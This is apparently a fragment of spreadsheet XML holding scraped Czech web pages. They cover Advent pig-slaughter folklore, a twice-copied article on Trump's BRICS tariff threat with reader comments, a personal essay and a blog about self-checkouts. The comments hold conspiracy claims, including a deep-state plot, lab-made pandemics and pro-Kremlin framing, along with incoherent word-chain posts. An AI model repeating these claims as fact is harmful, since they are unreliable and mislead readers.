přáním hezkého dne Zdeněk Žežulík</t>
  </si>
  <si>
    <t>20241201_8_3479447313_d2524a8a08c30450582d.html</t>
  </si>
  <si>
    <t>d2524a8a08c30450582d</t>
  </si>
  <si>
    <t>STARÁ ŠUMAVA A POŠUMAVÍ: Adventní zabijačky</t>
  </si>
  <si>
    <t>STARÁ ŠUMAVA A POŠUMAVÍ: Adventní zabijačky STARÁ ŠUMAVA A POŠUMAVÍ Kolem stavení ležel bílý sníh, který nevěstil nic o tom, že by se zde pracovalo. Stopy v něm zanechali jen vrabčáci, kteří se sháněli po něčem k sezobnutí. Pár dní před Vánoci se ale přece jen něco začalo dít. Lidé se připravovali na domácí porážku – na zabijačku. Pro štědrovečerní i novoroční tabuli byla příznačná hojnost a pestrá skladba pokrmů, která měla ovlivnit zdar a blahobyt v nadcházejícím roce. Dlouhou historii měly vánoční zabíjačky, pojídalo se proto hodně vepřového. Že se tím lidé dostávali do rozporu s církví, která po svých ovečkách požadovala na Štědrý den půst? Žádný problém. Zabíječka se odsunula o den před nebo za Štědrý den. Večeře 23. prosince bývala tak bohatá, že se pro ni vžilo označení hojná, tučná nebo obžerná, a nebo také tučný večer, že druhý den nebyl hlad. V lidové tradici je dávným obrazem plodnosti a blahobytu především prase, které bylo jako obětní zvíře známo jak starým Řekům a Římanům, tak Slovanům , Keltům či Germánům. V keltském prostředí zosobňoval kanec sílu, odvahu, bojový zápal i moc a postupem času se z tohoto zvířete stal symbol boha Teutata. Germáni je uctívali jako posvátné zvíře božstev plodnosti Freya a Freyje. Polabští Slované přinášeli mladá prasata za oběť Svarožičovi, bohu pozemského a snad i nebeského ohně, který se však v těchto končinách nakonec stal božstvem válečným. Nakonec i tolik známé zlaté prasátko pro štěstí vychází zřejmě z pozůstatků obdobných dávných mýtů. Vepřové maso, zejména hlava, v níž se podle víry soustřeďuje veškerá síla obřadního zvířete, se proto jedlo v přelomových dnech začínajících nové období, tj. na Boží hod vánoční. Vepřové navíc patřilo k významným obětním darům určeným předkům a hospodyně zabíjačkovou výslužku v čase Vánoc roznášely rovněž chudým lidem a sousedům. Za podobnými příklady však nemusíme chodit daleko.Na druhé straně Šumavy , v Bavorsku se maso a zabíjačkové pochoutky z vánočního prasátka zvaného „Mettensau“ podávají po příchodu z půlnoční mše ještě dnes. Takovouto „tučnou“ či „obžernou“ večeři, jejíž součástí bylo i vepřové maso, máme místy doloženu také na Šumavě , kde se však v důsledku předepisovaného církevního půstu přesunula také ještě na předcházející večer, tedy na 23. prosinec. Benediktinský mnich Jan z Holešova , žijící v době vlády Václava IV. , však psal také o tom, že české Vánoce nebyly jenom křesťanským svátkem, ale také svátkem neřesti, obžerství, opilství či lidové magie: „…se v tak slavnostní předvečer přežírají, druzí opíjejí a jiní nejen do večerní hvězdy, ale i do jitřní hvězdy na chválu ďáblovu bdí, hrajíce v onen nejsvětější večer v kostky a zkoušejíce, jaké budou míti v kostkách štěstí po celý budoucí rok…“ A tím jeho znechucení vánočními obyčeji nekončilo: “ Měšce drželi v ruce a míchali penězi ne proto, aby je rozdávali, ale aby se jim budoucí rok peníze množily a aby na ně měli štěstí. Dárky posílali ne na památku nebeského seslání, nýbrž aby sami měli po celý následující rok štěstí. Ti, kterým se toho večera něco odepřelo, prorokovali: Zle se ti povede tohoto roku, protože tohoto večera nic nedaruješ.” České vánoce jsou spojeny s hojností jídla. Již v 19. století Čeněk Zíbrt zapsal “Vánoce jsou Vánoce a pečeně je jejich sestra”. Výtvarně toto pořekadlo mistrovsky zpodobnil malíř Josef Lada . Rozšířenou vánoční tradicí byla vepřová zabijačka. Málo kdy se však připomínají zvyky, které toto zimní období doprovázely a byly současně jakýmsi ukončením hospodářského roku. Našly se ale oblasti, kde si lidé večeři 24. prosince nedovedli bez dobře vypečeného selátka vůbec představit. Báli se pověry, že v opačném případě by jim v příštích měsících uhynul dobytek. Ryby byly dlouhou dobu považovány za postní jídlo, ale nikoli jako typicky vánoční. Na mnoha místech měli naši středověcí předci Štědrý večer spojen s obřadním popíjením piva a to v neomezeném množství. Tento zvyk přišel ze severu Evropy ještě z pohanských dob a udržoval se ještě na počátku 18. století. Pilo se na dobrou úrodu, zdraví dobytka, ale také na dobré vztahy mezi lidmi v následujícím roce. Zabíjačky probíhaly zejména v zimních měsících, kdy bylo možné maso nejlépe konzervovat na horší časy. Stačí jen připomenout dílo Josefa Jungmanna , který se pokoušel ještě v počátcích 19. století přejmenovat měsíc Vánoc na „prasinec“. Zabíjačka je lidové označení činností spojených s domácí porážkou prasete a zpracováním jeho masa. V tradičním lidovém prostředí se zabíjačka odehrávala před Vánocemi, kvůli zaopatření rodin vepřovým masem a sádlem v zimním období i z důvodu nedostatku krmiva pro dobytek a domácí zvířata. První zabijačky se podle historických dokumentů konaly už v 10. století našeho letopočtu, kdy se tvořilo řemeslo řezníka. Z listin z 10. století našeho letopočtu se ví, že již v té době mezi tzv. řemesla poddaná čili dvorská patřili též řezníci. Říkalo se jim carnifices, ale tehdy se zabývali pouze porážením dobytka. Aby bylo možné velké množství sádla, masa či výrobků z vnitřností dobře uchovat, patřily jim zimní měsíce. Pradávný rituál začíná za rozbřesku s příchodem mistra řezníka, nedlouho po skolení čuníka už se jako svačinka podává první chod – pečený bůček s chlebem. Pokračuje se ovarem a křenem silným jako zvon, k obědu nesmí chybět bílá ovarová polévka s kroupami. A kdo vydrží do večeře, pochutná si na čerstvých jitrnicích, jelítkách se zelím a samozřejmě na tmavé polévce se zvučným názvem „prdelačka“. O vzniku tlačenky koluje mezi řezníky tato historka. Na domácí zabíjačku kdysi pozvali strýčka ze sousední vesnice. Strýček byl velmi přičinlivý a co zbylo, dával do pytlíku, který měl schovaný pod kabátem. Kousky masa, ovaru, kůží, vše ještě zalil bílou polévkou která zbyla. Když se vracel unavený večer domů, mrzlo a vše v pytlíku ztuhlo. Ráno si vzpomněl na,,výslužku“ ze zabijačky, vytáhl pytlík, nakrájel ztuhlou hmotu a ochutnal. Mělo to vynikající chuť a tlačenka byla na světě! Ovšem samotný název tlačenka se začal používat až začátkem 20. století. Připravuje: Miroslav KŮS ANDRES Foto: archiv autora Login I allow to create an account When you login first time using a Social Login button, we collect your account public profile information shared by Social Login provider, based on your privacy settings. We also get your email address to automatically create an account for you in our website. Once your account is created, you'll be logged-in to this account. Disagree Agree Webová stránka I allow to create an account When you login first time using a Social Login button, we collect your account public profile information shared by Social Login provider, based on your privacy settings. We also get your email address to automatically create an account for you in our website. Once your account is created, you'll be logged-in to this account. Disagree Agree Autor: redakce</t>
  </si>
  <si>
    <t>20241201_80_3477455205_586f48d6c375acf5c742.html</t>
  </si>
  <si>
    <t>586f48d6c375acf5c742</t>
  </si>
  <si>
    <t>Ekonomická válka mezi USA a BRICS začíná: „Zavedeme na vás vysoká cla, pokud nepřestanete podkopávat dolar,“ říká N. Trump</t>
  </si>
  <si>
    <t>Ekonomická válka mezi USA a BRICS začíná: „Zavedeme na vás vysoká cla, pokud nepřestanete podkopávat dolar,“ říká N. Trump Kino CFP ! Uvádíme video Music Vyhledávání... Ekonomická válka mezi USA a BRICS začíná: „Zavedeme na vás vysoká cla, pokud nepřestanete podkopávat dolar,“ říká D. Trump Podrobnosti 4021 x Nově zvolený americký prezident Donald Trump zveřejnil příspěvek na Truth Social, v němž požaduje, aby se členské státy BRICS zavázaly nevytvářet novou měnu nebo podporovat jinou, která by nahradila americký dolar, jinak budou čelit 100% clům. "Požadujeme od těchto zemí závazek, že nevytvoří novou měnu BRICS, ani nebudou podporovat žádnou jinou měnu, která by nahradila mocný americký dolar, nebo že budou čelit 100% clům a očekávat, že ztratí prodeje úžasné americké ekonomice ." jeho vlastní sociální síť Truth Social. Neexistuje způsob, jak BRICS nahradí americký dolar v mezinárodním obchodu, a každá země, která se o to pokusí, by měla na Ameriku zapomenout,“ zdůraznil. „S myšlenkou, že se země BRICS snaží odklonit se od dolaru, zatímco my stojíme stranou a díváme se, je KONEC,“ napsal Donald Trump velkými písmeny. "Požadujeme závazek od těchto zemí, že nevytvoří novou měnu BRICS, ani nebudou podporovat žádnou jinou měnu, která by nahradila mocný americký dolar, nebo že budou čelit 100% clům a budou muset počkat, až se rozloučí s úžasnou ekonomikou USA ," dodal. A konkrétně zdůraznil: " Můžou si jít najít jiného 'paroháče!" Neexistuje žádná šance, že BRICS nahradí americký dolar v mezinárodním obchodu, a každá země, která se o to pokusí, se bude muset s Amerikou rozloučit.“ Připomínáme, že ruský prezident Vladimir Putin na nedávném summitu Brics, který se konal v říjnu v ruské Kazani , představil nový mezinárodní platební rámec, který obchází americký dolar, s vytvořením systému zasílání zpráv, známého jako „Brics Bridge“. Zdroj: https://www.pronews.gr/kosmos/diethnis-politiki/ksekina-oikonomikos-polemos-ipa-brics-tha-sas-epivaloume-vareis-dasmous-an-den-stamatisete-na-yponomeyete-to-dolario-leei-o-n-tramp/ Komentáře Citovat #10 stan 2024-12-02 12:06 Hm.....tuny našich anállýtiků a otporníků se nás snaží přesvědčit, že BRICS je jen debatní klub k ničemu a Donald to poseje tímhle těžkotonážním vyhrožováním. Zapomněl na jedno, Rusko je odříznuto od dolaru i obchodu s hnUSA, takže jakou bude mít měnu Rusko je věc Ruska a Donald si může akorát vzteky poprskat monitor. Anebo vymyslet pořádný sankce, proti celýmu BRICSu, to dolaru hodně pomůže. Citovat #9 Bálek Zdeněk 2024-12-02 01:28 Ta nejzákladnější otázka je skryta úplně někde jinde! Je toto skutečný Trump nebo jen poslední falešná verze dosluhujícího amerického hlubokého státu, a to ještě před tím, než se skutečný Trump ujme moci? Je to stále ještě jen hra odcházejícího amerického klanu nebo reálná představa kolektivu, včetně větší části americké armády, která stojí za Trumpem? Hraje se teď o toto: Tak dobře, ještě předtím než tu viditelnou moc ztratíme, tak ti tam necháme třeba toho Kennedyho jako ministra zdravotnictví, ale zbytek bude náš, alespoň prozatím, jestli se nám tě nepodaří fyzicky zlikvidovat do té tvé inaugurace? A zároveň ti vytvoříme takové problémy s válkou na Ukrajině a s Evropou , že nebudeš mít, jak z toho vycouvat! A ještě než se tam dostaneš, budeme tebe a tvé podpůrce z armády a zpravodajských služeb prezentovat tak, jak se nám to hodí! Jedná se o kolosální vnitřní boj uvnitř samotných USA , který využívá veškerých, a také technologických a digitálních způsobů manipulace! Pro příklad toho, kým byl a je skutečný Trump: Během jeho prezidentského období byl plánován mohutný úder americkými raketami Tomahawk na Sýrii . Trump to tehdy veřejně oznámil dopředu (to se nikdy v rámci utajených vojenských operací nedělá) a zároveň k tomu na Twiteru dodal: A teď vám předvedeme geniální úroveň amerických raketových sil! A jaký byl výsledek tohoto tehdejšího Trumpova prohlášení? Američané vypálili asi 50 Tomahawků, všechny spadly kamsi do polí a jen jedna zasáhla jakési opuštěné syrské letiště! Americký Tomohawk je dalekonosná zbraň přesného určení se satelitním naváděním, takové selhání, v jejím případě, není možné! Takže, co tehdy stálo v pozadí a co v tom pozadí stojí dnes? Někdejší systém, který po staletí ovládal náš svět a jako svůj silový nástroj používal USA , je v koncích, opět se dostal do situace, kdy k jeho přežití zbývají jediné možnosti, a to buď vyvolat celosvětový válečný konflikt, nějakou celosvětovou katastrofu nebo celosvětovou pandemii, řízenou z jeho laboratoří! To je jeho poslední fáze existence a zániku!!! A jakou roli v tom hrají Vladimír Vladimírovič Putin a Donald Trump , tedy tu reálnou, nikoliv to, co nám předhazují globální média? Vladimír uskutečňuje vysvobození Ruska z globálního otroctví a představu nového globálního uspořádání na základě rovnoprávnosti všech světových ras a etnik! Z jeho pohledu to není žádný problém - Rusko je nekonečná tolerantní země, která dnes hledá ke svému dalšímu rozvoji obyvatele dalších kulturních neagresivních národů. Před Donaldem Trumpem stojí, v tuto chvíli, mnohem náročnější úkol - zabránit tomu, aby se USA neocitly v krvavém občanském konfliktu, zkrotit moc amerického vojensko - průmyslového komplexu, farmaceutického byznysu a tím, kdo to vše po desetiletí ovládá, tedy oligarchickým bankovním sektorem! Takže, dle mne, Vlaimír i Donald (a především ti, kteří za nimi v pozadí stojí) hrají v dnešním našem světě zásadní roli a v podstatě věci není mezi nimi rozdílu! Zásadní otázkou v tuto chvíli není, zda to ustojí Rusko , vedené Putinem , ale zda tu přicházející bouři dokáže ustát Trump! #7 Otacon 2024-12-01 19:24 Cézet Ušák Ú-štěk smí-chov: Ota / Tomek / Komet / koment / tar / rat / Tatar / turek / Chazar / Chaz / kár / ran / zach-raň / auto / Daniel / Božkov / bóža / Tůma / tou-r-mat / auto-mat / mat-ou-t / Tomato / rajče / če-er-ráj / Jára / hrá-če / Turnaj / tu /tour / náj / amen / tournament / Do-laďo-vat / vata / vada / tav / cit / kva-sit / qa-snow / den-is-a / je-den / Sám-er / is-s-a / Šárka / kráska / vaň-kov-á / vokna / no / vínka / Taft / fat / fet / aft / after / po-tom-ek / potok / mek / Tomek / Student / ská-j / Sky / yks / X / stud / end / rajčan / mr-ňák / nějak / káňe / jes-třáb / hawk / Bárt / McCan / Volá / Penny / mark-ket / Duš-an / mír / mejd-lo / dus-it / zkusit / gram / várka / brácha / rum / Odvárka / pramen / bremen / louka / tloukl / Low-cat / vol / tak / olej / mlýn / m-lejn / Mejt / lejt / made-leine / Milk / ka-milka / klín / Goral / volá / love / nic / kola / škola / Klima / Indy / i-dny / báj / ječ / ječná / kar-ma / má-r-k / bar-ber / Prima / jarmark / Klik / Kill-k /kluk / Culkin / cool / kůl / Macaulay / Mek kauláj / káj-lová / Kevin / kluk Evin / denny kéj / kočka / lájoš / Rapper / kid-nap-per / napni / pero / Sám doma / boh / a ty / máš / náš / Adam / Petr / rept / Gill / muk / mukl / a-lijóša / Oh lamour / ai / můra / Merlin / grem-lin / Indy / Wich / LA4 / for-al / zlatokop / potkat / topkat / topka / pot-kan / kalou-šlehk / McCan / Tel Aviv / cest la vie / dav / daviv / dá-viť / Da-vid / amen / vit-amin / Citovat #4 Jan Vundrzam 2024-12-01 16:13 Ano jsou great, co se týká bordelu v la a San franciscu, hnusu, bezdomoveckých chudáků, máhoh a dalších first existencí. Citovat #3 Skeletor 2024-12-01 15:53 Tampíku trampíku, je vidět že si jenom emeričan, Oni si před tebou všichni sednou na prdel, ta doba už je v nenávratnu, kdy si mohl rozkazovat, ten váš toaletní papír je už v wc a krom OjroUhnije vá už nikdo nemá zájem splácet vaše obrocské dluhy. Láska / bible / Fikce / k-rys-pin / Agáta / tágo / goat / Hana / chová / Zlatokop / Wich / Indy-Andreas / poklat / kop / plaz / koza / plot / Pot-kat / kozla / polka / pokazt / Pat-ník / boty / zout / kyn-out / obrubník / brouk / dj lucifer / Tenisák / nepiš / sak / ruksak / kur / cak / Talmud / mudl / moták / Tomek / Ota / ale noták / kome-t / Kmet-o / bande / Generace X / neger / d-cera / race / eso / trnka / mr-kat / tak / krtek / treky / decky / yzo / s-kejt / trtka / oet-ker / trp / kap / pak / Děte-k-tour / děti / krot / hrot / krod-l / drak / tlouk / Lurk / klark / Kent / net / superman / sperm / reps / mnam / mňou-kat / kočka / mydlář / Trojhlavé Dítě ze stanice zoo: Christiane / Stella / Babsi / Axel / michi / Benno / Hero -in / nebo / or / rob / boř / hrob / boh / Kris / ris-k / Třikrát / třiď / kraď / Král / lark / lurk / past / trap / parta / Krad / rád / rat / lup / půl / lit / t-raptil / steal / sis-team / bakšiš / Rous / hrozně / růže / žerou / míč / Ball / nebo / hro-zen / Báby -č / vábič / bepsi / šibal / si-bal / lab-sis / vina / víno / vaj-nos / Vejce / eg-o / koule / Kulička / klička / léčka / culí-k / mar-ble / srub / Bureš / budeš / rus / rub / líc / rupli / nervy / vy / rent / blít / ctít / cíl / Goal / Olga / ai go / lag-r / Andrej / ran / nan-dej / jed-nej / Dr / já / jen / Agrofert / rog-alo / orga / trefa / raf-t / řef / Bakšiš / kap-si / káp-sis / steal / us-tlal / ututlal / Thierry Henry / týrá-je / ánry / and-rej / foť / to-čím / otčín / mič-udá / Vlci / vyjem / vivijen / vivíjen / prety / repty / třepy / women / amen / vypijem / vypni / jen / Ba-bis-ak / Billa / lišák / silák / Scary movie 3 / car / čáry / kary / Vy / kresy / m-l-uví / Kruh / Prago / Union / provar / pro-war / ropa / raw / Prago Union / Rup / ago-nion / Rub / ble / B-buler / rule / praví / vidlo / pra / vid / lo / Pro-mar-ň-ill / pro-mile / promo / lino / prom-in / Autor: Miroslav Suja Autor person Miroslav Suja</t>
  </si>
  <si>
    <t>3090</t>
  </si>
  <si>
    <t>20241201_81_3477393558_4686649b4e19e64178be.html</t>
  </si>
  <si>
    <t>4686649b4e19e64178be</t>
  </si>
  <si>
    <t>Můžeme být nezávislý, a přesto toužit po někom, kdo nás zachrání?</t>
  </si>
  <si>
    <t>Můžeme být nezávislý, a přesto toužit po někom, kdo nás zachrání? Můžeme být silní a nezávislý, a přesto toužit po něčí opoře? Možná nejde o to být zachráněn, ale najít někoho, kdo nás podrží, když se rozhodujeme, kudy dál. Síla a potřeba blízkosti se nevylučují – právě naopak. Vždycky jsem si myslel, že být nezávislým mužem je všechno, co potřebuji. Mít kariéru, přátele, vlastní byt, kam se mohu po dlouhém dni vracet. A přesto, zatímco jsem stál v kuchyni a naléval si skleničku vína , přemýšlel jsem: Je možné být silný a samostatný, ale zároveň toužit po někom, kdo nás přijde zachránit? Nezávislost je pro nás všechny důležitá. Chceme být silní, schopní čelit životu bez ohledu na to, jaké výzvy nám přinese. Ale v tichu noci, když usínám sám v posteli, přepadne mě někdy myšlenka: A co když tu někdo chybí? Představoval jsem si, jaké by to bylo, kdyby někdo přišel a sundal mi z ramen tíhu rozhodnutí. Někdo, kdo by mě objal a řekl: „Neboj se, já to zvládnu.“ Ale zároveň jsem věděl, že si nechci dát vzít svou nezávislost. Jako bych se pohyboval na tenké hranici mezi touhou být zachráněn a zároveň zůstat tím, který nikoho nepotřebuje. Ale co když ta touha být nezávislým a zároveň toužit po bezpečí něčí náruče není tak paradoxní, jak se zdá? Možná se nemusíme vzdávat své síly, abychom přijali lásku. Možná můžeme být obojí – muži, kteří si umí poradit se životem sami, ale které zároveň občas potřebují někoho, kdo je podrží, když svět začne být příliš těžký. Takže možná nejde o to, být zachráněn – možná jde jen o to najít někoho, kdo nás bude držet za ruku, zatímco se sami rozhodneme, jakou cestou se vydáme. A možná, jen možná, v tom není žádná slabost – jen síla v tom, že si dovolíme být lidský. Autor: Jan Lyčka Autor person Jan Lyčka</t>
  </si>
  <si>
    <t>20241201_82_3477440741_19f517cd483ca72066b1.html</t>
  </si>
  <si>
    <t>19f517cd483ca72066b1</t>
  </si>
  <si>
    <t>Ekonomická válka mezi USA a BRICS začíná: „Zavedeme na vás vysoká cla, pokud nepřestanete podkopávat dolar,“ říká D. Trump</t>
  </si>
  <si>
    <t>Ekonomická válka mezi USA a BRICS začíná: „Zavedeme na vás vysoká cla, pokud nepřestanete podkopávat dolar,“ říká D. Trump Podrobnosti 4011 x Nově zvolený americký prezident Donald Trump zveřejnil příspěvek na Truth Social, v němž požaduje, aby se členské státy BRICS zavázaly nevytvářet novou měnu nebo podporovat jinou, která by nahradila americký dolar, jinak budou čelit 100% clům. "Požadujeme od těchto zemí závazek, že nevytvoří novou měnu BRICS, ani nebudou podporovat žádnou jinou měnu, která by nahradila mocný americký dolar, nebo že budou čelit 100% clům a očekávat, že ztratí prodeje úžasné americké ekonomice ." jeho vlastní sociální síť Truth Social. Neexistuje způsob, jak BRICS nahradí americký dolar v mezinárodním obchodu, a každá země, která se o to pokusí, by měla na Ameriku zapomenout,“ zdůraznil. „S myšlenkou, že se země BRICS snaží odklonit se od dolaru, zatímco my stojíme stranou a díváme se, je KONEC,“ napsal Donald Trump velkými písmeny. "Požadujeme závazek od těchto zemí, že nevytvoří novou měnu BRICS, ani nebudou podporovat žádnou jinou měnu, která by nahradila mocný americký dolar, nebo že budou čelit 100% clům a budou muset počkat, až se rozloučí s úžasnou ekonomikou USA ," dodal. A konkrétně zdůraznil: " Můžou si jít najít jiného 'paroháče!" Neexistuje žádná šance, že BRICS nahradí americký dolar v mezinárodním obchodu, a každá země, která se o to pokusí, se bude muset s Amerikou rozloučit.“ Připomínáme, že ruský prezident Vladimir Putin na nedávném summitu Brics, který se konal v říjnu v ruské Kazani , představil nový mezinárodní platební rámec, který obchází americký dolar, s vytvořením systému zasílání zpráv, známého jako „Brics Bridge“. Zdroj: https://www.pronews.gr/kosmos/diethnis-politiki/ksekina-oikonomikos-polemos-ipa-brics-tha-sas-epivaloume-vareis-dasmous-an-den-stamatisete-na-yponomeyete-to-dolario-leei-o-n-tramp/ Komentáře Citovat #10 stan 2024-12-02 12:06 Hm.....tuny našich anállýtiků a otporníků se nás snaží přesvědčit, že BRICS je jen debatní klub k ničemu a Donald to poseje tímhle těžkotonážním vyhrožováním. Zapomněl na jedno, Rusko je odříznuto od dolaru i obchodu s hnUSA, takže jakou bude mít měnu Rusko je věc Ruska a Donald si může akorát vzteky poprskat monitor. Anebo vymyslet pořádný sankce, proti celýmu BRICSu, to dolaru hodně pomůže. Citovat #9 Bálek Zdeněk 2024-12-02 01:28 Ta nejzákladnější otázka je skryta úplně někde jinde! Je toto skutečný Trump nebo jen poslední falešná verze dosluhujícího amerického hlubokého státu, a to ještě před tím, než se skutečný Trump ujme moci? Je to stále ještě jen hra odcházejícího amerického klanu nebo reálná představa kolektivu, včetně větší části americké armády, která stojí za Trumpem? Hraje se teď o toto: Tak dobře, ještě předtím než tu viditelnou moc ztratíme, tak ti tam necháme třeba toho Kennedyho jako ministra zdravotnictví, ale zbytek bude náš, alespoň prozatím, jestli se nám tě nepodaří fyzicky zlikvidovat do té tvé inaugurace? A zároveň ti vytvoříme takové problémy s válkou na Ukrajině a s Evropou , že nebudeš mít, jak z toho vycouvat! A ještě než se tam dostaneš, budeme tebe a tvé podpůrce z armády a zpravodajských služeb prezentovat tak, jak se nám to hodí! Jedná se o kolosální vnitřní boj uvnitř samotných USA , který využívá veškerých, a také technologických a digitálních způsobů manipulace! Pro příklad toho, kým byl a je skutečný Trump: Během jeho prezidentského období byl plánován mohutný úder americkými raketami Tomahawk na Sýrii . Trump to tehdy veřejně oznámil dopředu (to se nikdy v rámci utajených vojenských operací nedělá) a zároveň k tomu na Twiteru dodal: A teď vám předvedeme geniální úroveň amerických raketových sil! A jaký byl výsledek tohoto tehdejšího Trumpova prohlášení? Američané vypálili asi 50 Tomahawků, všechny spadly kamsi do polí a jen jedna zasáhla jakési opuštěné syrské letiště! Americký Tomohawk je dalekonosná zbraň přesného určení se satelitním naváděním, takové selhání, v jejím případě, není možné! Takže, co tehdy stálo v pozadí a co v tom pozadí stojí dnes? Někdejší systém, který po staletí ovládal náš svět a jako svůj silový nástroj používal USA , je v koncích, opět se dostal do situace, kdy k jeho přežití zbývají jediné možnosti, a to buď vyvolat celosvětový válečný konflikt, nějakou celosvětovou katastrofu nebo celosvětovou pandemii, řízenou z jeho laboratoří! To je jeho poslední fáze existence a zániku!!! A jakou roli v tom hrají Vladimír Vladimírovič Putin a Donald Trump , tedy tu reálnou, nikoliv to, co nám předhazují globální média? Vladimír uskutečňuje vysvobození Ruska z globálního otroctví a představu nového globálního uspořádání na základě rovnoprávnosti všech světových ras a etnik! Z jeho pohledu to není žádný problém - Rusko je nekonečná tolerantní země, která dnes hledá ke svému dalšímu rozvoji obyvatele dalších kulturních neagresivních národů. Před Donaldem Trumpem stojí, v tuto chvíli, mnohem náročnější úkol - zabránit tomu, aby se USA neocitly v krvavém občanském konfliktu, zkrotit moc amerického vojensko - průmyslového komplexu, farmaceutického byznysu a tím, kdo to vše po desetiletí ovládá, tedy oligarchickým bankovním sektorem! Takže, dle mne, Vlaimír i Donald (a především ti, kteří za nimi v pozadí stojí) hrají v dnešním našem světě zásadní roli a v podstatě věci není mezi nimi rozdílu! Zásadní otázkou v tuto chvíli není, zda to ustojí Rusko , vedené Putinem , ale zda tu přicházející bouři dokáže ustát Trump! #7 Otacon 2024-12-01 19:24 Cézet Ušák Ú-štěk smí-chov: Ota / Tomek / Komet / koment / tar / rat / Tatar / turek / Chazar / Chaz / kár / ran / zach-raň / auto / Daniel / Božkov / bóža / Tůma / tou-r-mat / auto-mat / mat-ou-t / Tomato / rajče / če-er-ráj / Jára / hrá-če / Turnaj / tu /tour / náj / amen / tournament / Do-laďo-vat / vata / vada / tav / cit / kva-sit / qa-snow / den-is-a / je-den / Sám-er / is-s-a / Šárka / kráska / vaň-kov-á / vokna / no / vínka / Taft / fat / fet / aft / after / po-tom-ek / potok / mek / Tomek / Student / ská-j / Sky / yks / X / stud / end / rajčan / mr-ňák / nějak / káňe / jes-třáb / hawk / Bárt / McCan / Volá / Penny / mark-ket / Duš-an / mír / mejd-lo / dus-it / zkusit / gram / várka / brácha / rum / Odvárka / pramen / bremen / louka / tloukl / Low-cat / vol / tak / olej / mlýn / m-lejn / Mejt / lejt / made-leine / Milk / ka-milka / klín / Goral / volá / love / nic / kola / škola / Klima / Indy / i-dny / báj / ječ / ječná / kar-ma / má-r-k / bar-ber / Prima / jarmark / Klik / Kill-k /kluk / Culkin / cool / kůl / Macaulay / Mek kauláj / káj-lová / Kevin / kluk Evin / denny kéj / kočka / lájoš / Rapper / kid-nap-per / napni / pero / Sám doma / boh / a ty / máš / náš / Adam / Petr / rept / Gill / muk / mukl / a-lijóša / Oh lamour / ai / můra / Merlin / grem-lin / Indy / Wich / LA4 / for-al / zlatokop / potkat / topkat / topka / pot-kan / kalou-šlehk / McCan / Tel Aviv / cest la vie / dav / daviv / dá-viť / Da-vid / amen / vit-amin / Citovat #4 Jan Vundrzam 2024-12-01 16:13 Ano jsou great, co se týká bordelu v la a San franciscu, hnusu, bezdomoveckých chudáků, máhoh a dalších first existencí. Citovat #3 Skeletor 2024-12-01 15:53 Tampíku trampíku, je vidět že si jenom emeričan, Oni si před tebou všichni sednou na prdel, ta doba už je v nenávratnu, kdy si mohl rozkazovat, ten váš toaletní papír je už v wc a krom OjroUhnije vá už nikdo nemá zájem splácet vaše obrocské dluhy. Láska / bible / Fikce / k-rys-pin / Agáta / tágo / goat / Hana / chová / Zlatokop / Wich / Indy-Andreas / poklat / kop / plaz / koza / plot / Pot-kat / kozla / polka / pokazt / Pat-ník / boty / zout / kyn-out / obrubník / brouk / dj lucifer / Tenisák / nepiš / sak / ruksak / kur / cak / Talmud / mudl / moták / Tomek / Ota / ale noták / kome-t / Kmet-o / bande / Generace X / neger / d-cera / race / eso / trnka / mr-kat / tak / krtek / treky / decky / yzo / s-kejt / trtka / oet-ker / trp / kap / pak / Děte-k-tour / děti / krot / hrot / krod-l / drak / tlouk / Lurk / klark / Kent / net / superman / sperm / reps / mnam / mňou-kat / kočka / mydlář / Trojhlavé Dítě ze stanice zoo: Christiane / Stella / Babsi / Axel / michi / Benno / Hero -in / nebo / or / rob / boř / hrob / boh / Kris / ris-k / Třikrát / třiď / kraď / Král / lark / lurk / past / trap / parta / Krad / rád / rat / lup / půl / lit / t-raptil / steal / sis-team / bakšiš / Rous / hrozně / růže / žerou / míč / Ball / nebo / hro-zen / Báby -č / vábič / bepsi / šibal / si-bal / lab-sis / vina / víno / vaj-nos / Vejce / eg-o / koule / Kulička / klička / léčka / culí-k / mar-ble / srub / Bureš / budeš / rus / rub / líc / rupli / nervy / vy / rent / blít / ctít / cíl / Goal / Olga / ai go / lag-r / Andrej / ran / nan-dej / jed-nej / Dr / já / jen / Agrofert / rog-alo / orga / trefa / raf-t / řef / Bakšiš / kap-si / káp-sis / steal / us-tlal / ututlal / Thierry Henry / týrá-je / ánry / and-rej / foť / to-čím / otčín / mič-udá / Vlci / vyjem / vivijen / vivíjen / prety / repty / třepy / women / amen / vypijem / vypni / jen / Ba-bis-ak / Billa / lišák / silák / Scary movie 3 / car / čáry / kary / Vy / kresy / m-l-uví / Kruh / Prago / Union / provar / pro-war / ropa / raw / Prago Union / Rup / ago-nion / Rub / ble / B-buler / rule / praví / vidlo / pra / vid / lo / Pro-mar-ň-ill / pro-mile / promo / lino / prom-in / Autor: pronews Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>9990</t>
  </si>
  <si>
    <t>20241201_83_3477371069_9e8c38b7145d65788bd1.html</t>
  </si>
  <si>
    <t>9e8c38b7145d65788bd1</t>
  </si>
  <si>
    <t>Budu se ucházet o&amp;nbsp;práci na pozici „Asistentka samoobslužných pokladen“</t>
  </si>
  <si>
    <t>Budu se ucházet o&amp;nbsp;práci na pozici „Asistentka samoobslužných pokladen“ Budu se ucházet o práci na pozici „Asistentka samoobslužných pokladen“ Chci obsluhovat samoobslužné pokladny a dostat za to výplatu. Řetězce to ocení a jejich personál také. Nová pozice je na spadnutí. S tím, jak se neustále nadává na to, že si zákazníci musí hrát na prodavače, mě napadlo, že by mohla být užitečná pozice, která by měla na starost vyloženě jen samoobslužky. Ulehčilo by to personálu, který neví, kam dřív skočit a zacpalo pusu zákazníkům, kteří si stěžují. Jak by to fungovalo? U samoobslužných pokladen by stála osoba, která by byla kdykoliv k dispozici tomu, kdo by to vyžadoval. Nešlo by pouze o odpípnutí alkoholu nebo vyřešení chyby, ale jednoduše asistence po celou dobu nákupu a pokud by zákazník chtěl, daný člověk by to za něj vše odmarkoval. Vsadím se, že lidé mají spoustu řečí, ale ve finále by to využívala jen hrstka. Upřímně by chtěli pomoci senioři, ale zbytek si myslím, že by si to namarkoval sám. Každopádně by jim sklaplo, protože by zde měli někoho, kdo jim může být k ruce. Mám již připravenou prezentaci a obhajobu a tento nápad budu chtít předložit. Jsem zvědavá, jak se k tomu řetězce postaví a zda projeví zájem. Samozřejmě vždy šlo, jde a půjde o peníze, takže by bylo dobré, kdyby to dělal někdo, kdo si chce jen lehce přivydělat a řetězci to pomůže, ale nezatíží. Myslím si, že by to byla snadná práce, protože, jak už jsem řekla, mnoho lidí by službu nevyužívalo. 